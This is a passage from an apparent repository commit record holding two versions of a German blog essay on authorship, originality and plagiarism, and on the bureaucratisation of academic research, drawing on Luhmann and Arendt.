wissenschaftlich in der unterscheidung innovation\/kopie, rechtlich als besitz\/diebstahl. Diese unterscheidung ist nun aber sehr grob und gen\u00fcgt weder der publizistik noch der forschung. Jede weitere unterscheidung mu\u00df aber \u00fcberall analoge unterscheidungen hervorrufen (oder gewinnt stabilit\u00e4t, wo sie dies tut und wird irritiert, wo dies nicht erf\u00fcllt ist.) So soll wissenschaftlich weder alles irgendwie neue gef\u00f6rdert, noch jeder gebrauch von (fremden) altem abgelehnt werden: es folgen die unterscheidungen innerhalb der unterscheidungsbereiche: 1. innovation\/originalit\u00e4t, wobei innovation (neue neuheit: \u00bberfindung\u00ab) gef\u00f6rdert, (nicht-innovative) originalit\u00e4t toleriert wird. Aber auch die kopie wird ein wichtigeres mittel, weshalb dann erlaubte von unerlaubter kopie (zitat\/plagiat) unterschieden wird. (Es ergibt sich der zwischenbereich des reinen zitats: Wer eine arbeit von William James abtippt, sie einreicht, die gesamte arbeit aber als zitat kenntlich macht, f\u00e4llt durch das seminar, ohne wissenschaftlich exkommuniziert zu werden. Der fall erscheint uns so seltsam, weil er ein leerbereich ist, mit dem wir nichts anfangen k\u00f6nnen: er ist weder vollkommen abzulehnen, noch w\u00e4re er irgendwie gefordert. Da\u00df dieses beispiel seltsam wirkt, sollte zur verbl\u00fcffung und faszinatin anregen.) Diese unterscheidungskonkretisierungen m\u00fcssen sich im recht wiederfinden und tut es teils: auch das recht kennt legitimierte\/nicht-legitimierte kopie (unter legitimierte kopie f\u00e4llt dann nicht nur das zitat, sondern auch die von einem durch den autor vertraglich legitimierten verlag kopien). Nur auf zu innovation\/originalit\u00e4t kennt das recht kein analogon. Das ist kein zu erkl\u00e4rendes problem, sondern zeigt den punkt, denn das dieses fehlt ist nicht grundlage f\u00fcr die behauptung der analogen unterscheidung, sondern f\u00fcr die irritation der unterscheidung innovation\/originalit\u00e4t. _jedes_ original verdient rechtlichen schutz. Aber warum ist es n\u00f6tig, eine originelle wiederholung sch\u00fctzen? Ist nicht auch das diebstahl an den innovationen anderer? (Ich darf nicht den text eines anderen als meinen ausgeben, aber wenn ich zwei in meinen worten wiederhole, ist es sch\u00fctzenswert.) Und wenn rechtlich keine mittel gefunden werden innovation von originalit\u00e4t zu unterscheiden, lie\u00dfe sich die r\u00fcckfrage stellen, wie dies in der wissenschaft m\u00f6glich w\u00e4re, und jede antwort darauf w\u00fcrde die frage stellen, warum dies nicht r\u00fcck\u00fcbertragbar w\u00e4re. Die frage, welche art der kopie noch kunst sei und welche nur kopie trifft gerade dieses problem: wie ist nicht-innovative originalit\u00e4t von der kopie zu unterscheiden? Diese instabilit\u00e4t durch fehlende analogizit\u00e4t der unterscheidungen wird auch an anderen stellen deutlich: so kennt die kunst kein analogon zu zitat und kopie, sondern nur h\u00f6chstens direkt kenntliche und unkenntliche kopie. Man mu\u00df nun zugleich von der kunst fordern, das plagiat abzulehnen, ohne ihr das mittel der unkenntlichen kopie zu berauben.) Dies erm\u00f6glicht das originalgenie durch bestimmte offenheit in verbindung mit unbestimmter geschlossenheit {}. Dadurch wird die notwendige r\u00fcckkopplung der verschiedenen diskursbereiche gew\u00e4hrleistet.\n\nDas recht erfordert nicht nur eine unterscheidung von original\/kopie, sondern zugleich eine personenbezogene unterscheidung von originalautor\/kopierer. Eine unterscheidung die f\u00fcr die zunehmende differenzierung und komplexe strukturierung wissenschaftlicher textproduktion allerdings unhaltbar ist, allerdings \u00fcbernommen werden _mu\u00df_, soll die gratifikation einzelner personen gew\u00e4hrleistet werden. (Die gratifikation einzelner menschen ist weder rechtlich noch wissenschaftlich n\u00f6tig; selbst wenn personen h\u00e4ufig menschen entsprechen.) Nicht anders verh\u00e4lt es sich f\u00fcr die publizistik, die f\u00fcr weite verbreitung kopien ben\u00f6tigt. dies ist allerdings insofern kein problem, als die kopie nun weiter in legitimierte\/nicht-legitimierte kopie unterscheidbar ist; dies wird in der wissenschaft als zitat\/plagiat ausinterpretiert, in der publizistik als (bezahlte und vertraglich festgelegte) werkpublikation\/(unbezahlte\/unerlaubte) raubkopie. W\u00e4hrend die wissenschaft die eigene reglementierung zitat\/plagiat selbstst\u00e4ndig durchsetzen kann (ich komme darauf zur\u00fcck), ben\u00f6tigt die publizistik den r\u00fcckbezug auf das recht: hier wird zur regelung von vertragsverh\u00e4ltnissen die konzeption des geistigen eigentums etabliert; ein genialer streich {}, der zugleich den bezug originalautor-originalgenie expliziert, w\u00e4hrend er diesen mit den bereits bestehenden mitteln der rechtlichen eigentumsregelung analogisiert. Dadurch m\u00fcssen keine vollst\u00e4ndig neuen rechtstechniken entwickelt, sondern nur alte mittel modifiziert werden.\n\n---\n\nB\u00dcROKRATIE\n\nIch lasse sowohl das recht wie die kunst beiseite (und \u00fcberlasse die besch\u00e4ftigung damit gewitzteren geistern) und besch\u00e4ftige mich mit der wissenschaft. Wie sich angedeutet haben mag, will ich zwischen forschung und wissenschaft unterscheiden, insofern wissenschaft b\u00fcrokratische forschung meint. Letzteres wird dann in form von akademien (instiutionalisierte wissenschaft) und universit\u00e4ten (lehre und forschung verbindende akademien){} Das komplexe auswirkungsverh\u00e4ltnis von forschung-lehre-institution scheint mir selten in angemessener weise behandelt zu werden. (Es wird dann vor allem auf einzelne unterschiede fixiert: lehrfreie forschung\/lehrgebundene forschung, staatliche organistion\/privatorganisation, nicht-akademische forschung\/forschung. Daraus l\u00e4\u00dft sich viel lernen. Es bleiben dann allerdings blinde flecken; die werden dann h\u00e4ufig nicht eingestanden, sondern die erkl\u00e4rungsl\u00fccken auf die einmal getroffene unterscheidung gezwungen.{})\n\nDieser umstand mag daran liegen, da\u00df die forschung l\u00e4ngst totalb\u00fcrokratisiert es, das hei\u00dft, es kaum noch unb\u00fcrokratisches forschen gibt; weder privatgelehrte spielen f\u00fcr die wissenschaft keine bedeutende rolle mehr {}; konzern- und firmengebundene forschung sowie popul\u00e4rwissenschaft haben sich l\u00e4ngst selbst disqualifiziert, indem ihre unabh\u00e4ngigkeitsideologie l\u00e4ngst zerst\u00f6rt wurde. Deshalb wird allenthalben gemeint, forschung sei und sei nur, was an universit\u00e4ten gemacht werde.{} Selten war progression so konservativ.\n\nKonservative progression.\n\nObwohl meist \u00fcbersehen, gibt es progressive konservation: Der bewahrungsvorsatz pa\u00dft sich neuen gegebenheiten an und ist bereit, priorit\u00e4ten offen zu ordnen und problematisieren.{} Ebenso gibt es konservative progression: Ver\u00e4nderungen und neuerungen erhalten etablierte strukturen.{} Dies soll nicht einem \u00bbwirklichen fortschritt\u00ab gegen\u00fcbergestellt werden \u2013 ich vertrete keinen naiven ideologierealismus. Auch konservative progression erm\u00f6glicht fortschritt; und da\u00df sie als mittel gew\u00e4hlt wurde, l\u00e4\u00dft mutma\u00dfen, da\u00df gerade sie (geordnete) progression erm\u00f6glicht hat. {} Indiz ist die zeit des 17. bis ins fr\u00fche 20. jh. Selten h\u00e4tte man die konversion von organisationsstrukturen bei gleichzeitiger ver\u00e4nderlich- und ver\u00e4nderbarkeit derer methoden, techniken und ergebnisse beobachten k\u00f6nnen. Hier wird von der flexibilit\u00e4t durch starrheit profitiert.\n\n\nMeine vermutung: dies liegt an der st\u00e4rke b\u00fcrokratischer organisation. Ihre formen sind starr, aber inhaltsleer; wodurch sie sowohl der judenvernichtung, als auch der demokratieerhaltung dienen k\u00f6nnen. Daf\u00fcr ist die entwicklung Deutschlands beispielhaft: Denn an den verfahren zur beurteilung der gegner von nationalsozialisten und den dann folgenden zur rechtssprechung \u00fcber die verbrechen der nationalsozialisten hat sich nichts, aber nat\u00fcrlich auch alles ver\u00e4ndert. Die rechtsverfahren als solche mu\u00dfte nicht abgel\u00f6st, sondern nur modifiziert werden, also bestimmte schritte angepa\u00dft werden. (adresse {})\n\n\n\u2026\n\n{Dies hei\u00dft durchaus nicht, professoren w\u00e4ren zwingend unf\u00e4hig \u2026 Professoren sind ja nicht nur professoren, sondern auch m\u00fctter, k\u00fcnstlerinnen, muslima, w\u00e4hlerin, konsumentin und vielleicht auch etwas verr\u00fcckte blogautorinnen. Das ein professor sich als professor nicht kritisch betrachten kann, hindert ja nicht, da\u00df sie eine skeptische haltung gegen eigenes verhalten in bestimmten rollen einnimmt. Nur wird es mit den jahren handlungs\u2026 immer unwahrscheinlicher, da l\u00e4ngere ein\u00fcbung von erkl\u00e4rungsmuster irritationen gekonnter und \u00bbinnovativer\u00ab disqualifizieren l\u00e4\u00dft. Man kennt das: die wahrscheinlichkeit das ein 5 j\u00e4hriger bezweifelt, da\u00df jungens keine r\u00f6cke tragen sollten ist sehr viel h\u00f6her, als das ein 55 j\u00e4hriger sich dar\u00fcber verbl\u00fcffen l\u00e4\u00dft. Aber das wunder langlebieger wunderei gibt es.\n\n\n\n\n\n\n\n\n\n\n\n\n\n---\n\n \nDa\u00df das problem gerade in der kunst so zentral ist, liegt daran, an verarbeitungstechniken, welche die wissenschaft sich gro\u00dfteilig untersagt, f\u00fcr welche in der kunst ein freiraum geschaffen wurde: Der aneignung und verarbeitung eines themas durch variierte durchf\u00fchrung; die unterscheidung original\/kopie probiert die kunst durch anwendung. (Gerade deshalb gibt es f\u00fcr Kusanowsky auch einen unterschied zwischen dem \u00bbspotler\u00ab und dem \u00bbverbrecher\u00ab. Beide nutzen die kopie f\u00fcr k\u00fcnstlerischen versuche. Jedoch deckt der sportler seine kopie als solche kenntlich macht und zugibt, w\u00e4hrend der verbrecher zugunsten seiner \u00f6konomsichen verwertungsinteressen die kopie nicht als solche zugibt. (Deshalb ist letzteres auch keine k\u00fcnstlerischer verarbeitung der kopie, sondern die kopiertechnik ein mittel wirtschaftlicher profitsteigerung.)\n\n\nhttps:\/\/differentia.wordpress.com\/2016\/08\/10\/kunst-sport-und-verbrechen\/\n\nBeltracchi konnte mit seiner Methode die Struktur der Kunst nicht beeindrucken, Landis dagegen konnte mit der selben Methode f\u00fcr die Beurteilung von Kunst eine Neuerung vorschlagen.\n\n\nDies war nicht immer so und mag sich wieder \u00e4ndern. Vgl. Feyerabend.\n\nAuch maler, zeichner, steinhauer, etc., ja auch komponisten. Ob in den malerischen und musischen produktionsk\u00fcnsten (im gegensatz zu malerischen und musischen exekutionsk\u00fcnsten) die autorkonzeption gleich beschrieben werden kann, wei\u00df ich nicht. Ich vermute ja und nein. Sie lassen sich mit den gleichen strukturen beschreiben, solange vermieden wird zu behaupten, die entwicklungen w\u00e4ren vollst\u00e4ndig analog.\n\n{Was nicht das gleiche ist. Bestimmte offenheit meint hier, da\u00df die anschlie\u00dfenden variativen anschl\u00fcsse immer zweckgebunden (n\u00e4mlich der st\u00fctzung ideal originalgenie) dient. Unbestimmte geschlossenheit meint, da\u00df der begriff originalgenie alle variationen verwendungen zwingt eine universale einortbarkeit in allen bereichen (also einschlu\u00df\/ausschlu\u00df) nach muster des originalgenies zu gew\u00e4hrleisten, mit welchen methoden auch immer.}\n\nIch bin in keiner weise sarkastisch: diese einf\u00fchrung diffizieler und komplizierter techniken finde ich faszinierend und bewundernswert. Ablehnungen des autorkonzepts gehen h\u00e4ufig mit plumper ablehnung vergangener leistungen und dem vorwurf einer gewissen \u00bbverwirrung\u00ab und \u00bbirrt\u00fcmlichkeit\u00ab einher. Ein vokabular, das erstaunlich nah an der abgelehnten konzeption orientiert ist. \u2013 Auch die ablehnung einer _aufrechterhaltung_ des originalautorkonzepts erzwingt aber keinen rousseauistischen romantizismus, der zu einer r\u00fcckkehrt zur nat\u00fcrlichen freiheit der kunst (oder was \u00e4hnlichem) aufruft. \u2026\n\nMeine unterscheidung akademie\/universit\u00e4t ist nicht \u00fcberfl\u00fcssig. Die verbindung von wissenschaft und der lehre dieser wissenschaft bedingt und wird bedingt (durch) bestimmte organisationsformen, die sich auf die forschungst\u00e4tigkeit auswirken: universit\u00e4ten bilden ihr eigenes personal aus. Das gilt f\u00fcr akademien nicht zwingend. \n\nEs ist gar nicht unwahrscheinlich, da\u00df ich einfach etwas nicht gelesen habe. Ich lasse mich dann gerne aufkl\u00e4ren und trage das hier nach. (In die kommentare unten oder an http:\/\/twitter.com\/bertrandterrier[@bertrandterrier].)\n\nIch vermute das \u00e4ndert sich. Durch das internet scheint ein neuer forschertyp erm\u00f6glicht zu werden, dem der einstige privatgelehrte am n\u00e4chsten kommt. Ihn zu beschreiben und zu verfassen ben\u00f6tigt es aber wohl neue beobachtungs- und beschreibungsmittel, die nur unwahrscheinlicherweise von der universit\u00e4ren wissenschaft etabliert werden, da dieser typ ihre gratifikationssicherheiten bedroht.\n\nDies f\u00fchrt zu den schmalhirnigsten \u00e4u\u00dferungen, welche einem manches mal zweifeln lassen, ob an universit\u00e4ten nicht prinzipiell die intelligenz fehle, forschung zu machen. So erz\u00e4hlt mir ein freund, auf die frage, wer denn ein philosoph sei, habe ihm ein dozent geantwortet: Der, der einen philosophischen abschlu\u00df hat. Das ist doof und man hofft auf h\u00f6heres denkverm\u00f6gen bei medizinern und pharmazeuten, von denen das eigene leben abh\u00e4ngt.\n\nInteressant dazu der fall in \u2026, wo ein konservativer staat f\u00fcr die aufnahme syrischer fl\u00fcchtlinge stimmt.\n\nSo paradox das klingt, sieht man\u2019s \u00fcberall: Das grundgesetz ist die neuformulierung der biblischen gebote, die aufkl\u00e4rung ist s\u00e4kularisierte theologie, 2016 ist 1933, etc. Dies hei\u00dft nicht, jede erkl\u00e4rung eines (vermeintlich) neuen ph\u00e4nomens durch ein altes sei prinzipiell schlecht und falsch. Es l\u00e4\u00dft sich jedoch eine selbstverpflichtete blindheit gegen neues beobachten. Jedoch l\u00e4\u00dft sich eine tendenz zur ignoranz neuer ph\u00e4nomene beobachten:\n\n++++\n<blockquote class=\"twitter-tweet\" data-lang=\"de\"><p lang=\"de\" dir=\"ltr\">Wenn der Schreiber daf\u00fcr sorgt, dass der Leser nur etwas Bekanntes wiederfindet. kann die Beobachtung von Neuem gut behindert werden.<\/p>— Klaus Kusanowsky (@kusanowsky) <a href=\"https:\/\/twitter.com\/kusanowsky\/status\/822378844065644544\">20. Januar 2017<\/a><\/blockquote> <script async src=\"\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>\n\n<blockquote class=\"twitter-tweet\" data-lang=\"de\"><p lang=\"de\" dir=\"ltr\">Die Verhinderung von Neuem gelingt, indem man f\u00fcr den Fortbestand von Nichtsneuem sorgt.<\/p>— Klaus Kusanowsky (@kusanowsky) <a href=\"https:\/\/twitter.com\/kusanowsky\/status\/822377924409987073\">20. Januar 2017<\/a><\/blockquote> <script async src=\"\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>\n++++\n\nDies liegt nicht an der ignoranz einer gro\u00dfe masse von wissenschaftlern; sondern an der festgelegtheit von beobachtungstechnik, welche die eigenen probleme grunds\u00e4tzlich blindsetzt. Es ben\u00f6tigt ja kein kurzes training, um sich die blindsetzung bestimmter probleme und die adelung anderer anzutrainieren (das hat sich bereits auf ca. 30 jahre (grundschule, schule, studium, promotion, habilitation) gesteigert.\n\nIch meine \u00bbfortschritt\u00ab nicht ideologisch, weshalb ich lieber von progression spreche; was nichts anderes hei\u00dft und nur einer verwirrung dient, der autor mache hier wohl auf eine verschobene implikation aufmerksam. Progression ist nicht gut oder schlecht, aber sie ist auch kein rein zeitlicher wechsel von annahmen. Sie meint, sp\u00e4teres bez\u00f6ge sich auf fr\u00fcheres; das g\u00e4lte aber auch f\u00fcr eine kultur, die pl\u00f6tzlich gro\u00dfen technologieverzicht leistet \u2013 insofern dies ja ein weiterschreiten und eben kein zur\u00fcckschreiten ist. (Vergessen ist ein schweres unterfangen: ich schreibe dar\u00fcber hier.)\n\nDer wichtigkeit der subjektentlastung durch adressierbarkeit hat meines wissens nach @ReisAgainst innoviert. Zu einem recht lahmen vortrag zur geschichte des kapitalismus in einem marxistisch-kommunistischen kontext wurden da \u00bbausnutzen\u00ab und \u00bbabh\u00e4ngigkeit\u00ab des arbeiters durch und von den kapitalistischen betriebsbesitzern der \u00bbselbstst\u00e4ndigkeit\u00ab des bauern mit eigenem grundst\u00fcck gegen\u00fcbergestellt. @ReisAgainst machte den (sehr intelligenten) punkt, da\u00df nur der arbeiter \u00fcber eine adresse f\u00fcr beschwerde und forderung habe, w\u00e4hrend dem bauer bei d\u00fcrre ein streik nichts helfe. Zu der bedeutung von adressierbarkeit hoffe ich auf einen text von ihm; da scheint mir fiel interessantes dran zu sein. Es lie\u00dfe sich dann auch fragen, ob nicht die adressierbarkeit von allem an jeden ein problem der modernen b\u00fcrokratie ist. Denn die totalit\u00e4t der adressierbarkeit f\u00fchrt doch gerade dazu, da\u00df jeder angesprochene schlicht auf andere adressen verweis, bis man aufgibt oder mit dem verweis auf die b\u00fcrokratischen verfahren selbst abserviert wird. Vgl. hierzu auch Arendt [MuG: 80]:\n\n____\nB\u00fcroktatie ist diejenige Staatsform, in welcher es niemanden mehr gibt, der Macht aus\u00fcbt; und wo alle gleicherma\u00dfen ohnm\u00e4chtig sind, haben wir eine Tyrannis ohne Tyrannen. \n____\n\n---\n\nLITERATUR\n\nLuhmann, Niklas: Wissenschaft der Gesellschaft (stw 1001), Frankfurt\/M, ^7^2015 [1990]","old_contents":"# DER TEXT ALS AUTOR\n:hp-tags: autor, forschung, originalgenie, text, wissenschaft\n:published_at: 2017-01-23\n\nWEITERER TEXT \u00dcBER DAS ORIGINALGENIE\n\n____\n\n\u00bbMittelalterliche Textgepflogenheiten, die das Buch selbst wie einen Autor sprechen lassen, haben den Buchdruck nicht \u00fcberlebt. Es w\u00e4re nicht ganz abwegig, sie wiederaufzugreifen, denn schlie\u00dflich stammt, jedenfalls wo es \u203awissenschaftlich\u2039 zugeht, nur sehr weniges, was in einem Buch zu lesen ist, von dem Autor selbst. \u00ab\n\n\u2014Luhmann, WdG, 11 fn. 1\n\n____\n\n\nDen konzipierenden, kritzelnden, tippenden, publizierenden menschen als \u203aautor\u2039 des folgetextes zu konzipieren mag sinn machen oder nicht. Zentral ist sie f\u00fcr die rechtliche behandlung von texterzeugnissen (\u00bbgeistigem eigentum\u00ab) zur zu- und absprechung von publikationsrechten und der sicherung der gratifikation bestimmter (nicht-agraischer und nicht-handwerklicher) berufsgruppen. Aber die autoridentifikationstechnik schw\u00e4chelt \u2013 plagiatsj\u00e4ger m\u00f6gen die ideologie des originalautors noch zu retten versuchen, aber die bedrohung der wissenschaftlich-k\u00fcnstlerischen professoralen (alles plagiatore) erzwingt eine diskussion \u00fcber das plagiat, die unterscheidungen wie original\/kopie\/plagiat zwar zu sichern versucht, gerade dieses aber nicht mehr vermag. Das liegt vor allem an neuen schreib- und publikationstechniken, wie sie f\u00fcr konkrete textproduktion unerl\u00e4\u00dflich, oder doch mindestens \u00f6konomisch profitabel geworden sind: Man denke an zitation und verweis in der wissenschaft, mash-up in der kunst \u2013 allgemein: der intertextualit\u00e4t. \n\nDer anri\u00df verdeutlicht: Die kl\u00e4rung kann sich l\u00e4ngst nicht auf einen diskursbereich begrenzt. Gerade die unbedachte vermischung der diskursinteressen und -wertungsmethoden hindert die versachlichung, und es meint die literarische kunst zu verteidigen, wer die gratifikatorischen interessen eines arbeiters sch\u00fctzt. Nicht das letzteres verwerflich w\u00e4re: das behauptet gerade eine ideologie, die dann am originalgenie der kunst festhalten mu\u00df, die gratifikationssicherheit f\u00fcr den arbeiter verdeckt zu besorgen, damit dieser nicht widerspenstig wird. Solcherlei hindert die versachlichung. Das konzept des originalautors ist in keinem bereich zwingend; genauso aber in keinem zwingend ausgeschlossen.\n\nIch skizziere eine kurze genialogie des originalautors durch st\u00fctzung des originalgenies und der einbettung bestimmter berufe in beamtentum und wissenschaft. Gerade so ausf\u00fchrlich, da\u00df wir den autor als rechtskonzept von anderen trennen und gerade diesen ignorieren k\u00f6nnen. Uns interessiert dann die verbindung des autorkonzepts in b\u00fcrokratie (der verbeamtete publizist) und der forschung (der originell-innovative autor) in der wissenschaft (das verbeamtete originalgenie) zu untersuchen.\n\nAngemerkt: Da\u00df sich die bereiche trennen lassen und ich fordere, sie sollten f\u00fcr die versachlichung auch getrennt werden, hei\u00dft nicht, sie w\u00e4ren vollkommen l\u00f6sbar. \n\n---\n\nKURZE GENEALOGIE\n\nUm 1800 wird die gratifikatorische absicherung bestimmter berufe notwendig, um ihre ausf\u00fchrung gesellschaftlich festigen zu k\u00f6nnen. Zu diesen geh\u00f6ren schriftsteller und journalisten, philosphen und wissenschaftler. {} Dies hat mehrere gr\u00fcnde: die zunehmende s\u00e4kularisierung und damit die n\u00f6tigung zur staatlichen institutionalisierung von wissenschaft, die \u2026 des m\u00e4zentums und einer damit einhergehenden bedrohung einer beruflichen besch\u00e4ftigung. Nachdem wissenschaft, literatur, jounralismus in produktion und konsumtion wahrscheinlich geworden waren, war der verzicht recht unwahrscheinlich \u2013 viel zu viel hing davon ab.\n\nDort liegt auch der ursprung der originalgeni\u00f6sen ideologie verborgen \u2013 sie erkl\u00e4rte fortschritt subjektbezogen; damit konnte einerseits der erf\u00fcllungsgeschichte der eschatologie eine fortschrittsgeschichte der aufkl\u00e4rung entgegengesetzt, und andererseits die genies als deren verwalter etabliert werden. Im originalgenie finden wir dabei die zentralen aspekte: die unterscheidung original\/kopie, nicht nur mit der aufwertung des ersteren, sondern zugleich mit der implizit unterlegten unterscheidung innovation-originell\/bez\u00fcglich-originell; andererseits der etablierung der engen verbindung des genius mit der sch\u00f6pfung des originals, da\u00df damit das originalgenie als solches etabliert, als andersherum das genie die entstehung von originalen (also die entstehung von innovation) erkl\u00e4rt. Die leistung der unterscheidung darf nicht unterbewertet werden, bedenkt man was zu gew\u00e4hrleisten war: die konzeption von innovation und originalgenie mu\u00dfte recht, wissenschaft (b\u00fcrokratischer forschung) und kunst gen\u00fcgen; sie mu\u00dfte also verschiedene unterscheidungsmittel f\u00fcr verschiedene unterscheidungszwecke zugleich etablieren und gleichzeitig \u00fcbertragbarkeit garantieren. {\u00dcbertragbarkeit meint nicht, da\u00df sich die wissenschaft der rechtsmittel bediente, sondern da\u00df (bspw.) einer unterscheidung im recht eine analoge unterscheidung in der wissenschaft gegen\u00fcbersteht. Analog hei\u00dft, da\u00df der gleiche ereignisbereich abgedeckt und diese ereignisse auf beiden seiten ablehnung oder zustimmung (nicht wissenschaftliche zustimmung und rechtliche ablehnung) erfahren. Der unterscheidung original\/kopie interpretiert sich wissenschaftlich in der unterscheidung innovation\/kopie, rechtlich als besitz\/diebstahl. Diese unterscheidung ist nun aber sehr grob und gen\u00fcgt weder der publizistik noch der forschung. Jede weitere unterscheidung mu\u00df aber \u00fcberall analoge unterscheidungen hervorrufen (oder gewinnt stabilit\u00e4t, wo sie dies tut und wird irritiert, wo dies nicht erf\u00fcllt ist.) So soll wissenschaftlich weder alles irgendwie neue gef\u00f6rdert, noch jeder gebrauch von (fremden) altem abgelehnt werden: es folgen die unterscheidungen innerhalb der unterscheidungsbereiche: 1. innovation\/originalit\u00e4t, wobei innovation (neue neuheit: \u00bberfindung\u00ab) gef\u00f6rdert, (nicht-innovative) originalit\u00e4t toleriert wird. Aber auch die kopie wird ein wichtigeres mittel, weshalb dann erlaubte von unerlaubter kopie (zitat\/plagiat) unterschieden wird. (Es ergibt sich der zwischenbereich des reinen zitats: Wer eine arbeit von William James abtippt, sie einreicht, die gesamte arbeit aber als zitat kenntlich macht, f\u00e4llt durch das seminar, ohne wissenschaftlich exkommuniziert zu werden. Der fall erscheint uns so seltsam, weil er ein leerbereich ist, mit dem wir nichts anfangen k\u00f6nnen: er ist weder vollkommen abzulehnen, noch w\u00e4re er irgendwie gefordert. Da\u00df dieses beispiel seltsam wirkt, sollte zur verbl\u00fcffung und faszinatin anregen.) Diese unterscheidungskonkretisierungen m\u00fcssen sich im recht wiederfinden und tut es teils: auch das recht kennt legitimierte\/nicht-legitimierte kopie (unter legitimierte kopie f\u00e4llt dann nicht nur das zitat, sondern auch die von einem durch den autor vertraglich legitimierten verlag kopien). Nur auf zu innovation\/originalit\u00e4t kennt das recht kein analogon. Das ist kein zu erkl\u00e4rendes problem, sondern zeigt den punkt, denn das dieses fehlt ist nicht grundlage f\u00fcr die behauptung der analogen unterscheidung, sondern f\u00fcr die irritation der unterscheidung innovation\/originalit\u00e4t. _jedes_ original verdient rechtlichen schutz. Aber warum ist es n\u00f6tig, eine originelle wiederholung sch\u00fctzen? Ist nicht auch das diebstahl an den innovationen anderer? (Ich darf nicht den text eines anderen als meinen ausgeben, aber wenn ich zwei in meinen worten wiederhole, ist es sch\u00fctzenswert.) Und wenn rechtlich keine mittel gefunden werden innovation von originalit\u00e4t zu unterscheiden, lie\u00dfe sich die r\u00fcckfrage stellen, wie dies in der wissenschaft m\u00f6glich w\u00e4re, und jede antwort darauf w\u00fcrde die frage stellen, warum dies nicht r\u00fcck\u00fcbertragbar w\u00e4re. Die frage, welche art der kopie noch kunst sei und welche nur kopie trifft gerade dieses problem: wie ist nicht-innovative originalit\u00e4t von der kopie zu unterscheiden? Diese instabilit\u00e4t durch fehlende analogizit\u00e4t der unterscheidungen wird auch an anderen stellen deutlich: so kennt die kunst kein analogon zu zitat und kopie, sondern nur h\u00f6chstens direkt kenntliche und unkenntliche kopie. Man mu\u00df nun zugleich von der kunst fordern, das plagiat abzulehnen, ohne ihr das mittel der unkenntlichen kopie zu berauben.) Dies erm\u00f6glicht das originalgenie durch bestimmte offenheit in verbindung mit unbestimmter geschlossenheit {}. Dadurch wird die notwendige r\u00fcckkopplung der verschiedenen diskursbereiche gew\u00e4hrleistet.\n\nDas recht erfordert nicht nur eine unterscheidung von original\/kopie, sondern zugleich eine personenbezogene unterscheidung von originalautor\/kopierer. Eine unterscheidung die f\u00fcr die zunehmende differenzierung und komplexe strukturierung wissenschaftlicher textproduktion allerdings unhaltbar ist, allerdings \u00fcbernommen werden _mu\u00df_, soll die gratifikation einzelner personen gew\u00e4hrleistet werden. (Die gratifikation einzelner menschen ist weder rechtlich noch wissenschaftlich n\u00f6tig; selbst wenn personen h\u00e4ufig menschen entsprechen.) Nicht anders verh\u00e4lt es sich f\u00fcr die publizistik, die f\u00fcr weite verbreitung kopien ben\u00f6tigt. dies ist allerdings insofern kein problem, als die kopie nun weiter in legitimierte\/nicht-legitimierte kopie unterscheidbar ist; dies wird in der wissenschaft als zitat\/plagiat ausinterpretiert, in der publizistik als (bezahlte und vertraglich festgelegte) werkpublikation\/(unbezahlte\/unerlaubte) raubkopie. W\u00e4hrend die wissenschaft die eigene reglementierung zitat\/plagiat selbstst\u00e4ndig durchsetzen kann (ich komme darauf zur\u00fcck), ben\u00f6tigt die publizistik den r\u00fcckbezug auf das recht: hier wird zur regelung von vertragsverh\u00e4ltnissen die konzeption des geistigen eigentums etabliert; ein genialer streich {}, der zugleich den bezug originalautor-originalgenie expliziert, w\u00e4hrend er diesen mit den bereits bestehenden mitteln der rechtlichen eigentumsregelung analogisiert. Dadurch m\u00fcssen keine vollst\u00e4ndig neuen rechtstechniken entwickelt, sondern nur alte mittel modifiziert werden.\n\n---\n\nB\u00dcROKRATIE\n\nIch lasse sowohl das recht wie die kunst beiseite (und \u00fcberlasse die besch\u00e4ftigung damit gewitzteren geistern) und besch\u00e4ftige mich mit der wissenschaft. Wie sich angedeutet haben mag, will ich zwischen forschung und wissenschaft unterscheiden, insofern wissenschaft b\u00fcrokratische forschung meint. Letzteres wird dann in form von akademien (instiutionalisierte wissenschaft) und universit\u00e4ten (lehre und forschung verbindende akademien){} Das komplexe auswirkungsverh\u00e4ltnis von forschung-lehre-institution scheint mir selten in angemessener weise behandelt zu werden. (Es wird dann vor allem auf einzelne unterschiede fixiert: lehrfreie forschung\/lehrgebundene forschung, staatliche organistion\/privatorganisation, nicht-akademische forschung\/forschung. Daraus l\u00e4\u00dft sich viel lernen. Es bleiben dann allerdings blinde flecken; die werden dann h\u00e4ufig nicht eingestanden, sondern die erkl\u00e4rungsl\u00fccken auf die einmal getroffene unterscheidung gezwungen.{})\n\nDieser umstand mag daran liegen, da\u00df die forschung l\u00e4ngst totalb\u00fcrokratisiert es, das hei\u00dft, es kaum noch unb\u00fcrokratisches forschen gibt; weder privatgelehrte spielen f\u00fcr die wissenschaft keine bedeutende rolle mehr {}; konzern- und firmengebundene forschung sowie popul\u00e4rwissenschaft haben sich l\u00e4ngst selbst disqualifiziert, indem ihre unabh\u00e4ngigkeitsideologie l\u00e4ngst zerst\u00f6rt wurde. Deshalb wird allenthalben gemeint, forschung sei und sei nur, was an universit\u00e4ten gemacht werde.{} Selten war progression so konservativ.\n\nKonservative progression.\n\nObwohl meist \u00fcbersehen, gibt es progressive konservation: Der bewahrungsvorsatz pa\u00dft sich neuen gegebenheiten an und ist bereit, priorit\u00e4ten offen zu ordnen und problematisieren.{} Ebenso gibt es konservative progression: Ver\u00e4nderungen und neuerungen erhalten etablierte strukturen.{} Dies soll nicht einem \u00bbwirklichen fortschritt\u00ab gegen\u00fcbergestellt werden \u2013 ich vertrete keinen naiven ideologierealismus. Auch konservative progression erm\u00f6glicht fortschritt; und da\u00df sie als mittel gew\u00e4hlt wurde, l\u00e4\u00dft mutma\u00dfen, da\u00df gerade sie (geordnete) progression erm\u00f6glicht hat. {} Indiz ist die zeit des 17. bis ins fr\u00fche 20. jh. Selten h\u00e4tte man die konversion von organisationsstrukturen bei gleichzeitiger ver\u00e4nderlich- und ver\u00e4nderbarkeit derer methoden, techniken und ergebnisse beobachten k\u00f6nnen. Hier wird von der flexibilit\u00e4t durch starrheit profitiert.\n\n\nMeine vermutung: dies liegt an der st\u00e4rke b\u00fcrokratischer organisation. Ihre formen sind starr, aber inhaltsleer; wodurch sie sowohl der judenvernichtung, als auch der demokratieerhaltung dienen k\u00f6nnen. Daf\u00fcr ist die entwicklung Deutschlands beispielhaft: Denn an den verfahren zur beurteilung der gegner von nationalsozialisten und den dann folgenden zur 